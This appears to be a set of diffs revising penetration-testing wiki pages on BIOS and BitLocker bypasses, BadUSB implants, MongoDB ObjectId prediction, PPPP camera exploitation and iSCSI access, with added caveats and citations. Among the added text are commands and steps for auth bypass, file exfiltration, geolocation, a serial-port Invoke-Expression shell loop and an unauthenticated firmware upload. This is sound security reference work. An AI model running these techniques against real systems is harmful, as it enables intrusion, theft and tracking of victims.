-CBC-MAC is secure only under specific conditions (notably **fixed-length messages** and correct domain separation).
+CBC-MAC is secure only under specific conditions (notably **fixed-length messages** and correct domain separation). AES-CMAC is a standardized construction that safely handles variable-length inputs.<sup>[[5]](#references)</sup>
 
 ### Classic variable-length forgery pattern
 
@@ -194,7 +196,7 @@ Autosolvers:
 
 ### RC4
 
-RC4 is a stream cipher; encrypt/decrypt are the same operation.
+RC4 is a legacy stream cipher; encrypt/decrypt are the same XOR operation. Its known biases make it unsuitable for new systems, and TLS explicitly prohibits its cipher suites.<sup>[[6]](#references)</sup>
 
 If you can get RC4 encryption of known plaintext under the same key, you can recover the keystream and decrypt other messages of the same length/offset.
 
@@ -207,6 +209,13 @@ https://0xrick.github.io/hack-the-box/kryptos/
 ## References
 
 - [1] [Trail of Bits – Carelessness versus craftsmanship in cryptography](https://blog.trailofbits.com/2026/02/18/carelessness-versus-craftsmanship-in-cryptography/)
+- [2] [NIST SP 800-38A - Recommendation for Block Cipher Modes of Operation](https://csrc.nist.gov/pubs/sp/800/38/a/final)
+- [3] [NIST SP 800-38D - Recommendation for Galois/Counter Mode (GCM) and GMAC](https://csrc.nist.gov/pubs/sp/800/38/d/final)
+- [4] [RFC 8452 - AES-GCM-SIV: Nonce Misuse-Resistant Authenticated Encryption](https://www.rfc-editor.org/rfc/rfc8452)
+- [5] [RFC 4493 - The AES-CMAC Algorithm](https://www.rfc-editor.org/rfc/rfc4493)
+- [6] [RFC 7465 - Prohibiting RC4 Cipher Suites](https://www.rfc-editor.org/rfc/rfc7465)
+- [7] [OWASP Web Security Testing Guide - Testing for Padding Oracle](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/02-Testing_for_Padding_Oracle)
+- [8] [GCHQ CyberChef](https://gchq.github.io/CyberChef/)
+- [9] [PyCryptodome documentation](https://www.pycryptodome.org/)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/hardware-physical-access/physical-attacks.md
+++ b/src/hardware-physical-access/physical-attacks.md
@@ -6,7 +6,7 @@
 
 Legacy PC firmware settings may be reset by disconnecting the CMOS battery or using a documented clear-CMOS jumper. The necessary power-off time is board-specific, and modern UEFI passwords or keys may live in nonvolatile flash, an embedded controller, or a security device and therefore survive a battery removal. Consult the board/service manual before shorting pins; this procedure can also invalidate TPM measurements and trigger disk-encryption recovery.
 
-On legacy x86 systems, tools such as **killCMOS** and **CmosPwd** can inspect or alter CMOS-backed settings from a bootable environment. They are not generic UEFI password removers and require sufficient hardware/firmware access.
+On legacy x86 systems, tools such as **killCMOS** and **CmosPwd** can inspect or alter CMOS-backed settings from a bootable environment. CmosPwd recognizes password formats from a documented set of older BIOS families and can back up, restore, or erase/kill CMOS state; its published builds target legacy DOS/Windows, Linux, FreeBSD, and NetBSD environments.<sup>[[18]](#references)</sup> These utilities are not generic UEFI password removers and require sufficient hardware/firmware access.
 
 Some laptop firmware displays a vendor-specific challenge code after several failed password attempts. Databases such as [bios-pw.org](https://bios-pw.org) can derive legacy vendor recovery passwords for some models, but many systems implement lockout without a derivable challenge. Treat any generated password as model-specific and avoid exhausting permanent attempt counters.
 
@@ -213,5 +213,6 @@ After the tenth cycle the EC sets a flag that instructs the BIOS to wipe NVRAM a
 - [15] [Hak5 USB Rubber Ducky documentation](https://docs.hak5.org/hak5-usb-rubber-ducky/)
 - [16] [Microsoft Learn - BitLocker operations guide](https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/operations-guide)
 - [17] [Microsoft Learn - holding Shift and automatic logon behavior](https://learn.microsoft.com/en-us/troubleshoot/windows-client/user-profiles-and-logon/hold-shift-key-shutting-down-not-disable-automatic-logon)
+- [18] [CGSecurity - CmosPwd documentation and downloads](https://www.cgsecurity.org/wiki/CmosPwd)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/hardware-physical-access/physical-attacks.md
+++ b/src/hardware-physical-access/physical-attacks.md
@@ -4,25 +4,27 @@
 
 ## BIOS Password Recovery and System Security
 
-**Resetting the BIOS** can be achieved in several ways. Most motherboards include a **battery** that, when removed for around **30 minutes**, will reset the BIOS settings, including the password. Alternatively, a **jumper on the motherboard** can be adjusted to reset these settings by connecting specific pins.
+Legacy PC firmware settings may be reset by disconnecting the CMOS battery or using a documented clear-CMOS jumper. The necessary power-off time is board-specific, and modern UEFI passwords or keys may live in nonvolatile flash, an embedded controller, or a security device and therefore survive a battery removal. Consult the board/service manual before shorting pins; this procedure can also invalidate TPM measurements and trigger disk-encryption recovery.
 
-For situations where hardware adjustments are not possible or practical, **software tools** offer a solution. Running a system from a **Live CD/USB** with distributions like **Kali Linux** provides access to tools like **_killCmos_** and **_CmosPWD_**, which can assist in BIOS password recovery.
+On legacy x86 systems, tools such as **killCMOS** and **CmosPwd** can inspect or alter CMOS-backed settings from a bootable environment. They are not generic UEFI password removers and require sufficient hardware/firmware access.
 
-In cases where the BIOS password is unknown, entering it incorrectly **three times** will typically result in an error code. This code can be used on websites like [https://bios-pw.org](https://bios-pw.org) to potentially retrieve a usable password.
+Some laptop firmware displays a vendor-specific challenge code after several failed password attempts. Databases such as [bios-pw.org](https://bios-pw.org) can derive legacy vendor recovery passwords for some models, but many systems implement lockout without a derivable challenge. Treat any generated password as model-specific and avoid exhausting permanent attempt counters.
 
 ### UEFI Security
 
-For modern systems using **UEFI** instead of traditional BIOS, the tool **chipsec** can be utilized to analyze and modify UEFI settings, including the disabling of **Secure Boot**. This can be accomplished with the following command:
+For modern **UEFI** systems, CHIPSEC can audit Secure Boot variable protections. Start with the non-modifying check below; the optional `-a modify` mode deliberately attempts to corrupt variables and should be used only on a recoverable lab system. CHIPSEC itself warns that its privileged driver and low-level hardware access are unsuitable for production endpoints.<sup>[[11]](#references)</sup>
 
 ```bash
-python chipsec_main.py -module exploits.secure.boot.pk
+chipsec_main -m common.secureboot.variables
+# Destructive validation on a recoverable test system only:
+chipsec_main -m common.secureboot.variables -a modify
 ```
 
 ---
 
 ## RAM Analysis and Cold Boot Attacks
 
-RAM retains data briefly after power is cut, usually for **1 to 2 minutes**. This persistence can be extended to **10 minutes** by applying cold substances, such as liquid nitrogen. During this extended period, a **memory dump** can be created using tools like **dd.exe** and **volatility** for analysis.
+DRAM does not lose every bit immediately when refresh stops. The decay rate varies substantially with module technology and temperature; cooling can preserve useful data for far longer than an uncooled power cycle. A cold-boot attack rapidly reboots into a small acquisition environment or transfers a cooled module, captures raw memory, and reconstructs cryptographic keys despite bit decay. A disk-copy utility is not automatically a physical-memory imager, and Volatility analyzes a capture rather than acquiring it; use a platform-appropriate, validated acquisition tool.<sup>[[12]](#references)</sup>
 
 ---
 
@@ -49,15 +51,15 @@ Modern GPU Rowhammer attacks become much more useful when they target **GPU virt
 
 ## Direct Memory Access (DMA) Attacks
 
-**INCEPTION** is a tool designed for **physical memory manipulation** through DMA, compatible with interfaces like **FireWire** and **Thunderbolt**. It allows for bypassing login procedures by patching memory to accept any password. However, it's ineffective against **Windows 10** systems.
+**Inception** demonstrates **DMA-based memory acquisition and patching** over interfaces such as FireWire and early Thunderbolt configurations, including historical login-bypass signatures. It is not simply “ineffective against Windows 10”: exploitability depends on the interface, target build, IOMMU policy, lock state, and whether Windows Kernel DMA Protection is supported and enabled. Windows 10 version 1803 and later introduced Kernel DMA Protection on compatible platforms, substantially changing the attack surface.<sup>[[13]](#references)[[14]](#references)</sup>
 
 ---
 
 ## Live CD/USB for System Access
 
-Changing system binaries like **_sethc.exe_** or **_Utilman.exe_** with a copy of **_cmd.exe_** can provide a command prompt with system privileges. Tools such as **chntpw** can be used to edit the **SAM** file of a Windows installation, allowing password changes.
+On an unencrypted or already-unlocked Windows volume, an offline environment can replace accessibility binaries such as **sethc.exe** or **Utilman.exe** with **cmd.exe**, yielding a SYSTEM command prompt when the corresponding logon-screen shortcut runs. Tools such as **chntpw** can edit local SAM account data. These methods do not bypass a locked BitLocker volume and can damage credentials protected with DPAPI/EFS; preserve forensic copies and backups.
 
-**Kon-Boot** is a tool that facilitates logging into Windows systems without knowing the password by temporarily modifying the Windows kernel or UEFI. More information can be found at [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).<sup>[[10]](#references)</sup>
+**Kon-Boot** is a commercial boot-time authentication-bypass tool for supported Windows/macOS configurations. Compatibility depends on the OS, firmware mode, Secure Boot, and disk-encryption setup; it does not decrypt a BitLocker-locked volume.<sup>[[10]](#references)</sup>
 
 ---
 
@@ -65,17 +67,17 @@ Changing system binaries like **_sethc.exe_** or **_Utilman.exe_** with a copy o
 
 ### Boot and Recovery Shortcuts
 
-- **Supr**: Access BIOS settings.
-- **F8**: Enter Recovery mode.
-- Pressing **Shift** after the Windows banner can bypass autologon.
+- **Delete/Supr**, F2, F10, or another vendor key may open firmware setup.
+- **F8** enters legacy Windows advanced boot options only on configurations where that path remains enabled; current recovery entry varies.
+- Holding **Shift** can suppress Windows automatic logon in some configurations, although policy/registry settings can disable that behavior.<sup>[[17]](#references)</sup>
 
 ### BAD USB Devices
 
-Devices like **Rubber Ducky** and **Teensyduino** serve as platforms for creating **bad USB** devices, capable of executing predefined payloads when connected to a target computer.
+Devices such as **USB Rubber Ducky** and Teensy boards can enumerate as trusted HID keyboards and inject predefined keystrokes. The payload initially has the privileges and desktop access of the logged-on session; UAC prompts, screen locking, keyboard layout, timing, and endpoint USB policy still constrain it.<sup>[[15]](#references)</sup>
 
 ### Volume Shadow Copy
 
-Administrator privileges allow for the creation of copies of sensitive files, including the **SAM** file, through PowerShell.
+Administrator or backup privileges can create a shadow copy or save registry hives so locked files such as **SAM** and **SYSTEM** can be acquired. This is a post-compromise collection technique, not a privilege bypass, and should be correlated with `diskshadow`/VSS and registry-hive export events.
 
 ## BadUSB / HID Implant Techniques
 
@@ -83,7 +85,7 @@ Administrator privileges allow for the creation of copies of sensitive files, in
 
 - ESP32-S3 based implants such as **Evil Crow Cable Wind** hide inside USB-A→USB-C or USB-C↔USB-C cables, enumerate purely as a USB keyboard, and expose their C2 stack over Wi-Fi. The operator only needs to power the cable from the victim host, create a hotspot named `Evil Crow Cable Wind` with password `123456789`, and browse to [http://cable-wind.local/](http://cable-wind.local/) (or its DHCP address) to reach the embedded HTTP interface.<sup>[[8]](#references)</sup>
 - The browser UI provides tabs for *Payload Editor*, *Upload Payload*, *List Payloads*, *AutoExec*, *Remote Shell*, and *Config*. Stored payloads are tagged per OS, keyboard layouts are switched on the fly, and VID/PID strings can be altered to mimic known peripherals.
-- Because the C2 lives inside the cable, a phone can stage payloads, trigger execution, and manage Wi-Fi credentials without touching the host OS—ideal for short dwell-time physical intrusions.
+- Because the C2 lives inside the cable, a phone can stage payloads, trigger execution, and manage Wi-Fi credentials without using the organization's network—useful for short dwell-time physical intrusions.
 
 ### OS-aware AutoExec payloads
 
@@ -106,7 +108,7 @@ $port.Open(); while($true){$cmd=$port.ReadLine(); if($cmd){Invoke-Expression $cm
 
 ### HTTP OTA update surface
 
-- The same web stack usually exposes unauthenticated firmware updates. Evil Crow Cable Wind listens on `/update` and flashes whatever binary is uploaded:
+- The documented Evil Crow Cable Wind interface exposes an unauthenticated firmware-update endpoint at `/update`:<sup>[[8]](#references)</sup>
 
 ```bash
 curl -F "file=@firmware.ino.bin" http://cable-wind.local/update
@@ -116,13 +118,13 @@ curl -F "file=@firmware.ino.bin" http://cable-wind.local/update
 
 ## Bypassing BitLocker Encryption
 
-BitLocker encryption can potentially be bypassed if the **recovery password** is found within a memory dump file (**MEMORY.DMP**). Tools like **Elcomsoft Forensic Disk Decryptor** or **Passware Kit Forensic** can be utilized for this purpose.
+An authorized forensic acquisition of a live or recently running system may contain a BitLocker volume master key or related key material while the volume is unlocked. Commercial tools such as Elcomsoft Forensic Disk Decryptor and Passware Kit Forensic can search supported memory images, hibernation files, or crash dumps, but success is not guaranteed. Modern Windows also encrypts crash dumps when BitLocker is enabled, and a stored 48-digit recovery password is a different artifact from an in-memory volume key.<sup>[[12]](#references)[[16]](#references)</sup>
 
 ---
 
 ## Social Engineering for Recovery Key Addition
 
-A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.
+An attacker who persuades an administrator to run BitLocker-management commands can add a recovery-password, external-key, or other protector and then capture it. A recovery password cannot be an arbitrary string of zeros: BitLocker numerical recovery passwords have a validated 48-digit format. The relevant authorized-administration syntax is `manage-bde -protectors -add C: -recoverypassword`; list the resulting protectors with `manage-bde -protectors -get C:`. Monitor protector additions and ensure new recovery material is escrowed only to approved locations.<sup>[[16]](#references)</sup>
 
 ---
 
@@ -135,9 +137,9 @@ Many modern laptops and small-form-factor desktops include a **chassis-intrusion
 1. The switch is wired to a **GPIO interrupt** on the EC.
 2. Firmware running on the EC keeps track of the **timing and number of presses**.
 3. When a hard-coded pattern is recognised, the EC invokes a *mainboard-reset* routine that **erases the contents of the system NVRAM/CMOS**.
-4. On next boot, the BIOS loads default values – **supervisor password, Secure Boot keys, and all custom configuration are cleared**.
+4. On the next boot, affected models load reset firmware state. Depending on the vendor and revision, the cleared state may include a supervisor password, custom boot settings, or enrolled Secure Boot keys; TPM state and disk-encryption effects must be assessed separately.
 
-> Once Secure Boot is disabled and the firmware password is gone, the attacker can simply boot any external OS image and obtain unrestricted access to the internal drives.
+> A firmware reset may restore external-boot options, but it does **not** decrypt storage. BitLocker or another full-disk encryption system can enter recovery after TPM/firmware changes and still protect the internal drive without a recovery key.<sup>[[16]](#references)</sup>
 
 ### Real-World Example – Framework 13 Laptop
 
@@ -156,8 +158,8 @@ After the tenth cycle the EC sets a flag that instructs the BIOS to wipe NVRAM a
 1. Power-on or suspend-resume the target so the EC is running.
 2. Remove the bottom cover to expose the intrusion/maintenance switch.
 3. Reproduce the vendor-specific toggle pattern (consult documentation, forums, or reverse-engineer the EC firmware).
-4. Re-assemble and reboot – firmware protections should be disabled.
-5. Boot a live USB (e.g. Kali Linux) and perform usual post-exploitation (credential dumping, data exfiltration, implanting malicious EFI binaries, etc.).
+4. Reassemble and reboot, then inspect which firmware settings and credentials actually changed.
+5. If authorized and external boot is available, boot a controlled live image. Once an internal volume is legitimately unlocked (or if it was never encrypted), the live environment can acquire credentials and data or inspect the EFI System Partition. Modifying that partition to install an EFI implant is persistent and highly intrusive, and remains constrained by Secure Boot, measured boot, firmware write protection, and endpoint monitoring. Encrypted storage remains inaccessible without its key or recovery material.
 
 ### Detection & Mitigation
 
@@ -203,6 +205,13 @@ After the tenth cycle the EC sets a flag that instructs the BIOS to wipe NVRAM a
 - [7] [SensePost – “Noooooooo Touch! – Bypassing IR No-Touch Exit Sensors with a Covert IR Torch”](https://sensepost.com/blog/2025/noooooooooo-touch/)
 - [8] [Mobile-Hacker – “Plug, Play, Pwn: Hacking with Evil Crow Cable Wind”](https://www.mobile-hacker.com/2025/12/01/plug-play-pwn-hacking-with-evil-crow-cable-wind/)
 - [9] [Bruce Schneier - Rowhammer Attack Against NVIDIA Chips](https://www.schneier.com/blog/archives/2026/05/rowhammer-attack-against-nvidia-chips.html)
-- [10] [raymond.cc - Login To Windows Administrator And Linux Root Account Without Knowing Or Changing Current Password](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password)
+- [10] [Kon-Boot official documentation and compatibility information](https://kon-boot.com/)
+- [11] [CHIPSEC documentation - Secure Boot variable protections](https://chipsec.github.io/modules/chipsec.modules.common.secureboot.variables.html)
+- [12] [Lest We Remember: Cold Boot Attacks on Encryption Keys](https://www.usenix.org/legacy/events/sec08/tech/full_papers/halderman/halderman.pdf)
+- [13] [Inception - physical memory manipulation over DMA](https://github.com/carmaa/inception)
+- [14] [Microsoft Learn - Kernel DMA Protection](https://learn.microsoft.com/en-us/windows/security/hardware-security/kernel-dma-protection-for-thunderbolt)
+- [15] [Hak5 USB Rubber Ducky documentation](https://docs.hak5.org/hak5-usb-rubber-ducky/)
+- [16] [Microsoft Learn - BitLocker operations guide](https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/operations-guide)
+- [17] [Microsoft Learn - holding Shift and automatic logon behavior](https://learn.microsoft.com/en-us/troubleshoot/windows-client/user-profiles-and-logon/hold-shift-key-shutting-down-not-disable-automatic-logon)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/27017-27018-mongodb.md
+++ b/src/network-services-pentesting/27017-27018-mongodb.md
@@ -96,6 +96,16 @@ Older ObjectId layouts exposed separate machine and process identifiers; the cur
 
 Given an observed ObjectId, `mongo-objectid-predict` generates nearby candidates for authorization testing.<sup>[[9]](#references)</sup> Treat this as a targeted IDOR test rather than a general ObjectId breaker: it is most effective when the target IDs share the timestamp, process-random component, and adjacent counter values.
 
+The upstream command exposes `--counter-diff` (how many adjacent counter values to explore), `--per-counter` (how many timestamp offsets to try for each counter), and `--backward` (generate earlier rather than later candidates). Its defaults are `20` and `60`, producing roughly a thousand candidates; expand them only after establishing that a smaller authorized sample shares the generator component.<sup>[[9]](#references)</sup>
+
+```bash
+./mongo-objectid-predict 5ae9b90a2c144b9def01ec37
+./mongo-objectid-predict 5ae9b90a2c144b9def01ec37 --counter-diff 50 --per-counter 120
+./mongo-objectid-predict 5ae9b90a2c144b9def01ec37 --backward
+```
+
+The repository currently contains Python 2-era code and describes the older machine-ID/process-ID terminology. Review or port it before use, and do not mistake generated candidates for evidence that a resource exists or that access is authorized.
+
 ## Post
 
 With authorized root access to a self-managed host, you can audit the effective configuration and, in a disposable recovery lab, start a local-only instance with authorization disabled. Current YAML configuration uses `security.authorization: disabled`; legacy `noauth = true` examples apply to old configuration formats. Do not expose that recovery listener beyond loopback.<sup>[[7]](#references)</sup>

--- a/src/network-services-pentesting/27017-27018-mongodb.md
+++ b/src/network-services-pentesting/27017-27018-mongodb.md
@@ -4,7 +4,7 @@
 
 ## Basic Information
 
-**MongoDB** is an **open source** database management system that uses a **document-oriented database model** to handle diverse forms of data. It offers flexibility and scalability for managing unstructured or semi-structured data in applications like big data analytics and content management. **Default port:** 27017, 27018
+**MongoDB** is an open-source, document-oriented database. A normal `mongod` or `mongos` listener defaults to TCP **27017**, a shard server defaults to **27018**, and a config server defaults to **27019**.<sup>[[7]](#references)</sup>
 
 ```
 PORT      STATE SERVICE VERSION
@@ -29,7 +29,7 @@ for db in cursor:
 #If admin access, you could dump the database also
 ```
 
-**Some MongoDB commnads:**
+**Some MongoDB commands:**
 
 ```bash
 show dbs
@@ -54,8 +54,7 @@ nmap -sV --script "mongo* and default" -p 27017 <IP> #By default all the nmap mo
 
 ## Login
 
-By default mongo does not require password.\
-**Admin** is a common mongo database.
+Self-managed MongoDB defaults to `security.authorization: disabled`, but it also defaults to binding only to localhost. An externally reachable listener without authorization is therefore a dangerous configuration, not a safe Internet-facing default.<sup>[[7]](#references)</sup> The `admin` database is the usual authentication database for administrative users.
 
 ```bash
 mongo <HOST>
@@ -83,24 +82,23 @@ grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not 
 
 Example [from here](https://techkranti.com/idor-through-mongodb-object-ids-prediction/).<sup>[[1]](#references)</sup>
 
-Mongo Object IDs are **12-byte hexadecimal** strings:
+MongoDB ObjectIds are **12-byte values**, conventionally displayed as 24 hexadecimal characters:<sup>[[8]](#references)</sup>
 
 ![http://techidiocy.com/_id-objectid-in-mongodb/](../images/id-and-ObjectIds-in-MongoDB.png)
 
 For example, here’s how we can dissect an actual Object ID returned by an application: 5f2459ac9fa6dc2500314019
 
-1. 5f2459ac: 1596217772 in decimal = Friday, 31 July 2020 17:49:32
-2. 9fa6dc: Machine Identifier
-3. 2500: Process ID
-4. 314019: An incremental counter
+1. `5f2459ac`: a 4-byte Unix timestamp (`1596217772`, Friday, 31 July 2020 17:49:32 UTC)
+2. `9fa6dc2500`: a 5-byte random value generated once per client-side process
+3. `314019`: a 3-byte counter initialized to a random value
 
-Of the above elements, machine identifier will remain the same for as long as the database is running the same physical/virtual machine. Process ID will only change if the MongoDB process is restarted. Timestamp will be updated every second. The only challenge in guessing Object IDs by simply incrementing the counter and timestamp values, is the fact that Mongo DB generates Object IDs and assigns Object IDs at a system level.<sup>[[1]](#references)</sup>
+Older ObjectId layouts exposed separate machine and process identifiers; the current specification replaced those fields with one per-process random value. The timestamp changes once per second and the counter increments within a process, so IDs observed from the same generator in a narrow time window can still be partially predictable. This is not universal: drivers generate ObjectIds client-side, different processes use different random values, and applications may choose unrelated `_id` values.<sup>[[1]](#references)[[8]](#references)</sup>
 
-The tool [https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict), given a starting Object ID (you can create an account and get a starting ID), it sends back about 1000 probable Object IDs that could have possibly been assigned to the next objects, so you just need to bruteforce them.
+Given an observed ObjectId, `mongo-objectid-predict` generates nearby candidates for authorization testing.<sup>[[9]](#references)</sup> Treat this as a targeted IDOR test rather than a general ObjectId breaker: it is most effective when the target IDs share the timestamp, process-random component, and adjacent counter values.
 
 ## Post
 
-If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
+With authorized root access to a self-managed host, you can audit the effective configuration and, in a disposable recovery lab, start a local-only instance with authorization disabled. Current YAML configuration uses `security.authorization: disabled`; legacy `noauth = true` examples apply to old configuration formats. Do not expose that recovery listener beyond loopback.<sup>[[7]](#references)</sup>
 
 ## MongoBleed zlib Memory Disclosure (CVE-2025-14847)
 
@@ -170,6 +168,9 @@ dataset = xdr_data
 - [4] [MongoDB Security Advisory SERVER-115508](https://jira.mongodb.org/browse/SERVER-115508)
 - [5] [MongoBleed PoC (joe-desimone/mongobleed)](https://github.com/joe-desimone/mongobleed)
 - [6] [Censys – MongoBleed Advisory](https://censys.com/advisory/cve-2025-14847)
+- [7] [MongoDB Manual - Self-Managed Configuration File Options](https://www.mongodb.com/docs/manual/reference/configuration-options/)
+- [8] [MongoDB Manual - ObjectId BSON type](https://www.mongodb.com/docs/manual/reference/bson-types/#objectid)
+- [9] [andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict)
 
 ---
 

--- a/src/network-services-pentesting/32100-udp-pentesting-pppp-cs2-p2p-cameras.md
+++ b/src/network-services-pentesting/32100-udp-pentesting-pppp-cs2-p2p-cameras.md
@@ -6,9 +6,10 @@
 
 PPPP (a.k.a. “P2P”) is a proprietary device connectivity stack by CS2 Network that’s widely embedded in low-cost IP cameras and other IoT devices. It provides rendezvous, NAT traversal (UDP hole punching), an application-layer “reliable” stream on top of UDP, and an ID-based addressing scheme, allowing a mobile/desktop app to reach devices anywhere on the Internet by knowing only a device ID.<sup>[[1]](#references)</sup>
 
-Key traits relevant to attackers:
+Key traits relevant to attackers:<sup>[[1]](#references)[[4]](#references)</sup>
+
 - Devices register to three vendor-operated rendezvous servers per ID prefix. Clients query the same servers to find the device’s external/relay address, then attempt UDP hole punching. Relay fallback exists.
-- Default server listener is reachable over UDP/32100. A minimal “hello” probe is enough to fingerprint servers and some devices.
+- The rendezvous-server listener is commonly reachable over UDP/32100. A minimal “hello” probe can fingerprint servers and some devices.
 - Optional blanket cipher and a special “CRCEnc” mode exist but are weak by design and are typically disabled in popular ecosystems (e.g., LookCam).
 - Control plane is usually JSON commands over the PPPP stream and commonly suffers from missing auth and memory-safety bugs.
 
@@ -72,9 +73,10 @@ Useful commands observed:
 - DownloadFile – arbitrary path read primitive without path restrictions.
 
 Workflow to deanonymize location via transient artifacts:
-1) Send {"cmd":"searchWiFiList"}.
-2) Read /tmp/wifi_scan.txt via DownloadFile.
-3) Submit BSSID MACs to a geolocation API (e.g., Google Geolocation API) to localize the camera to tens of meters.
+
+1. Send `{"cmd":"searchWiFiList"}`.
+2. Read `/tmp/wifi_scan.txt` through `DownloadFile`.
+3. Submit observed BSSIDs to an authorized geolocation service. Accuracy depends on the service's database and local access-point density.
 
 ## Memory-Safety to RCE on Embedded Firmware
 
@@ -87,7 +89,7 @@ memcpy(buf, cmd, strlen(cmd)); // no bound check
 ```
 
 - Trigger: any cmd string > 255 bytes causes a stack buffer overflow (CWE-120/121).
-- Protections: no stack canary; DEP/NX and ASLR commonly disabled on these builds.
+- Protections: the analyzed builds lacked stack canaries, NX, and ASLR; verify each target rather than assuming all PPPP firmware has the same build settings.
 - Impact: straightforward single-stage shellcode or classic ROP/ret2libc on the device’s CPU (e.g., ARM) for full compromise and LAN pivoting.<sup>[[1]](#references)</sup>
 
 See also:
@@ -127,23 +129,32 @@ Some firmwares reboot in a loop until rendezvous servers are reachable. If egres
 
 ## Practical Exploitation Playbook (for repro/defense testing)
 
-1) Obtain device ID
+1. Obtain device ID
 - From app UI or AP SSID; otherwise enumerate PREFIX+number and brute 22^5 verifier space.
 
-2) Establish PPPP session
+2. Establish PPPP session
 - Use a CS2 PPPP client or custom code; extract server IP lists and init keys from the app init string; attempt UDP hole punching; fall back to relay.
 
-3) Bypass auth
+3. Test the documented authentication bypass
 - Skip LoginDev or ignore its result; send operational JSON directly.
 
-4) Exfiltrate files / geo-locate
+4. Validate file-read and geolocation exposure
 - Send {"cmd":"searchWiFiList"}; then DownloadFile "/tmp/wifi_scan.txt"; submit BSSIDs to a geolocation API.
 
-5) Achieve RCE
+5. Validate memory safety in a lab
 - Send a cmd > 255 bytes to trigger the stack overflow; build ROP/ret2libc or drop shellcode (no canary/DEP/ASLR).
 
-6) Cloud access
+6. Test cloud authorization
 - Interact with api.l040z.com endpoints using only the device ID; note 5 MiB chunking; cloud enablement controlled by /camera/signurl regardless of the app UI state.
+
+The concrete hostnames, commands, missing checks, and exploitability observations above describe the analyzed LookCam/Anyka ecosystem; they are not universal properties of every product that embeds a PPPP-derived library.<sup>[[1]](#references)[[3]](#references)</sup>
+
+## Defensive validation
+
+- Block unnecessary outbound rendezvous/relay traffic and inbound UDP/32100 at network boundaries, then verify that required local operation still works.
+- Inventory device IDs exposed in SSIDs, screenshots, support logs, and mobile-app telemetry.
+- Capture traffic to confirm whether control/video/cloud data is encrypted and authenticated rather than trusting a vendor's “P2P encrypted” label.
+- Replace unsupported vendor firmware where feasible. Compatible Anyka devices have community firmware projects, but hardware support and security properties must be evaluated per model before flashing.<sup>[[6]](#references)</sup>
 
 ## Related Protocols/Services
 

--- a/src/network-services-pentesting/3260-pentesting-iscsi.md
+++ b/src/network-services-pentesting/3260-pentesting-iscsi.md
@@ -1,14 +1,12 @@
-# 3260 - Pentesting ISCSI
+# 3260 - Pentesting iSCSI
 
 {{#include ../banners/hacktricks-training.md}}
 
 ## Basic Information
 
-From [Wikipedia](https://en.wikipedia.org/wiki/ISCSI):
+**Internet Small Computer System Interface (iSCSI)** carries SCSI commands over TCP. A client called an **initiator** connects to a **target**, selects a logical unit (LUN), and receives block-level storage that the operating system treats much like a locally attached disk. It commonly runs over existing IP networks instead of dedicated Fibre Channel infrastructure.<sup>[[3]](#references)</sup>
 
-> In computing, **iSCSI** is an acronym for **Internet Small Computer Systems Interface**, an Internet Protocol (IP)-based storage networking standard for linking data storage facilities. It provides block-level access to storage devices by carrying SCSI commands over a TCP/IP network. iSCSI is used to facilitate data transfers over intranets and to manage storage over long distances. It can be used to transmit data over local area networks (LANs), wide area networks (WANs), or the Internet and can enable location-independent data storage and retrieval.
->
-> The protocol allows clients (called initiators) to send SCSI commands (CDBs) to storage devices (targets) on remote servers. It is a storage area network (SAN) protocol, allowing organizations to consolidate storage into storage arrays while providing clients (such as database and web servers) with the illusion of locally attached SCSI disks. It mainly competes with Fibre Channel, but unlike traditional Fibre Channel which usually requires dedicated cabling, iSCSI can be run over long distances using existing network infrastructure.
+iSCSI requires CHAP support but does not require deployments to use it, and CHAP over an unencrypted channel has known limitations. An exposed target with no authentication can therefore grant raw read/write access to a LUN; even with CHAP, use IPsec or another protected network when confidentiality is required.<sup>[[3]](#references)</sup>
 
 **Default port:** 3260
 
@@ -27,11 +25,11 @@ This script will indicate if authentication is required.
 
 ### [Brute force](../generic-hacking/brute-force.md#iscsi)
 
-### [Mount ISCSI on Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How_to_set_up_and_use_iSCSI_target_on_Linux)
+### Mount iSCSI on Linux
 
-**Note:** You may find that when your targets are discovered, they are listed under a different IP address. This tends to happen if the iSCSI service is exposed via NAT or a virtual IP. In cases like these, `iscsiadmin` will fail to connect. This requires two tweaks: one to the directory name of the node automatically created by your discovery activities, and one to the `default` file contained within this directory.
+**Note:** A SendTargets response may advertise a portal different from the address used for discovery, which is common behind NAT or a virtual IP. Open-iSCSI identifies a persistent node record by both target IQN and portal, so logging in to an unreachable advertised address fails.<sup>[[4]](#references)</sup>
 
-For example, you are trying to connect to an iSCSI target on 123.123.123.123 at port 3260. The server exposing the iSCSI target is actually at 192.168.1.2 but exposed via NAT. isciadm will register the _internal_ address rather than the _public_ address:
+For example, you are trying to connect to an iSCSI target on `123.123.123.123:3260`. The target is actually at `192.168.1.2` but exposed through NAT, and `iscsiadm` registers the internal address rather than the public address:
 
 ```
 iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
@@ -39,7 +37,18 @@ iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
 [...]
 ```
 
-This command will create a directory in your filesystem like this:
+Prefer creating an explicit node record for the reachable portal, then configure authentication on that record if required:<sup>[[4]](#references)</sup>
+
+```bash
+iscsiadm -m node --op new \
+  --targetname 'iqn.1992-05.com.emc:fl1001433000190000-3-vnxe' \
+  --portal 123.123.123.123:3260
+iscsiadm -m node \
+  --targetname 'iqn.1992-05.com.emc:fl1001433000190000-3-vnxe' \
+  --portal 123.123.123.123:3260 --login
+```
+
